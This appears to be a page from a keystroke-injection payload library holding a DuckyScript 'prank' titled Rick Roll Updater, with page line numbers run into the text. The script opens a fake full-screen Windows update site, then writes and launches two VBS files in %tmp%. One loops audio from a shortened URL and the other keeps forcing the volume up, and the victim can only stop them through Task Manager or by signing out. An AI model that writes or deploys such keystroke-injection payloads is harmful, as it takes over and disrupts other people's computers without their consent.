Path: blob/master/payloads/library/prank/RickUpdater/payload.txt
2968 views
REM Title: Rick Roll Updater1REM Author: MocconaCoffee2REM Description: Load a fake Windows 10 update screen and creates two Visual Basic Scripts *rickyou.vbs* and *volup.vbs* in the **%tmp%** directory.3REM Description: *rickyou.vbs* is responsible for playing the rick roll audio, while *volup.vbs* is responsible for maintaining the volume.4REM Notes: *The only way to cancel the rick roll is to manually end the VBS tasks via task manager or to sign out via CTRL ALT DELETE.5REM Tested OS: Windows 10 (other distributions of Windows haven't been tested, they may or may not work).6DELAY 30007GUI r8DELAY 1009STRING https://fakeupdate.net/win10ue/10ENTER11DELAY 50012F1113DELAY 50014GUI r15DELAY 20016STRING cmd17ENTER18DELAY 20019STRING mode con: cols=20 lines=120ENTER21DELAY 20022STRING color fe23ENTER24DELAY 50025STRING del %tmp%\rickyou.vbs26ENTER27DELAY 20028STRING del %tmp%\volup.vbs29ENTER30DELAY 20031STRING cd %tmp% && copy con rickyou.vbs32ENTER33STRING While true34ENTER35STRING Dim oPlayer36ENTER37STRING Set oPlayer = CreateObject("WMPlayer.OCX")38ENTER39STRING oPlayer.URL = "http://tinyurl.com/s63ve48"40ENTER41STRING oPlayer.controls.play42ENTER43STRING While oPlayer.playState <> 1 ' 1 = Stopped44ENTER45STRING WScript.Sleep 10046ENTER47STRING Wend48ENTER49STRING oPlayer.close50ENTER51STRING Wend52ENTER53DELAY 10054CTRL z55ENTER56STRING copy con volup.vbs57ENTER58STRING do59ENTER60STRING Set WshShell = CreateObject("WScript.Shell")61ENTER62STRING WshShell.SendKeys(chr(&hAF))63ENTER64STRING loop65ENTER66CTRL z67ENTER68STRING start rickyou.vbs && volup.vbs69ENTER70STRING exit71ENTER7273